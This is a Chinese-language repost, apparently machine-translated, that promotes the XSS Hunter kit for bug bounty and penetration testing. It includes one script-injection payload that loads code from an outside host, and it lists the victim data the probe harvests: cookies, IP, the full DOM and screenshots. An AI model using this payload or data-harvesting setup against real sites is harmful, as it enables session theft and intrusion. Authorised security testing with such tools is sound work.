XSS Hunter 强大的XSS源码套件支持iOS手机端

  • A+
所属分类:网络安全工具

XSS猎人源代码

这是在XSS hunter上运行的源代码的可移植版本。它被设计为可以轻松安装在任何服务器上,供安全专业人士和希望以更强大的方式测试XSS的bug赏金猎手使用。

XSS Hunter 强大的XSS源码套件支持iOS手机端

要求

最好是Ubuntu的服务器。

一个Mailgun帐户,用于发送出XSS有效载荷火电子邮件。

一个域名,最好是短小的,以减少有效负载。这是一个很好的网站。

通配符SSL证书,这是一个便宜的。这是必需的,因为XSS Hunter根据其子域识别用户,并且他们都需要启用SSL。我们不能使用Let's Encrypt,因为它们不支持通配符证书。我会阻止诽谤CA的商业模式,但请放心,它非常愚蠢,并且很少花费给你一张通配符证书,所以请使用最便宜的提供商(只要它在所有浏览器中都受支持)

功能概述

注册后,您将创建一个特殊的短域名,例如xss.cesafe.com标识您的XSS漏洞并托管您的有效负载。然后,您可以在XSS测试中使用此子域,并使用XSS注入尝试:

  1. "><script src=//yoursubdomain.xss.ht></script>

XSS Hunter会自动提供XSS探针并在启动时收集结果信息。

特征

受管理的XSS负载触发:管理XSS Hunter帐户的控制面板中的所有XSS负载。

强大的XSS探针:每当探测器在易受攻击的页面上触发时,就会收集以下信息:

易受攻击的页面的URI

执行起源

受害者的IP地址

页面引用者

受害者的用户代理

所有非HTTP仅Cookie

页面的完整HTML DOM

受影响页面的完整屏幕截图

负责任的HTTP请求(如果使用了XSS Hunter兼容工具)

完整页面截图:XSS Hunter探针利用HTML5画布API生成XSS有效载荷触发的易受攻击页面的完整屏幕截图。借助此功能,您可以进入内部管理面板,支持桌面,日志记录系统和其他内部Web应用程序。这可以提供更强大的报告,显示漏洞对客户或bug奖励计划的全面影响。

标记报告生成:每个XSS有效负载报告都附带预先生成的降价报告。这些生成的报告还兼容其他降价支持平台,例如Phabricator,可轻松报告公司票务系统的错误报告。

XSS Payload火灾邮件报告:XSS负载火警还会发送详细的电子邮件报告,这些报告可以轻松转发给适当的安全联系人,以便轻松报告重要的错误。

自动生成负载:XSS Hunter自动生成XSS负载,供您在Web应用程序安全测试中使用。

相关注入:也许XSS Hunter最强大的功能是将注入尝试与XSS有效载荷火灾相关联的能力。通过使用XSS Hunter兼容测试工具,您可以立即知道是什么造成了特定的有效载荷触发(甚至在注射尝试完成后数周!)。

有效负载电子邮件的选项PGP加密:额外的偏执?客户端PGP加密可用于加密受害者浏览器中的所有注入数据,然后将其发送到XSS Hunter服务。

页面抓取:在您的XSS负载启动后,您可以指定有效负载的相对路径列表以自动检索和存储。这对查找其他漏洞很有用,例如crossdomain.xml通常无法访问的内部系统上的错误策略。

辅助有效载荷:在XSS Hunter完成它之后,你有没有想要加载的辅助有效载荷?XSS Hunter为您提供了指定辅助JavaScript负载在完成收集后运行的选项。

iOS Web应用程序:也可以通过iOS Web应用程序查看XSS有效负载。简单地导航到/app路径并将该页面保存为Web应用程序到您的iPhone桌面。

下载地址

部分内容被隐藏
需登陆后可查看
CE安全网

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: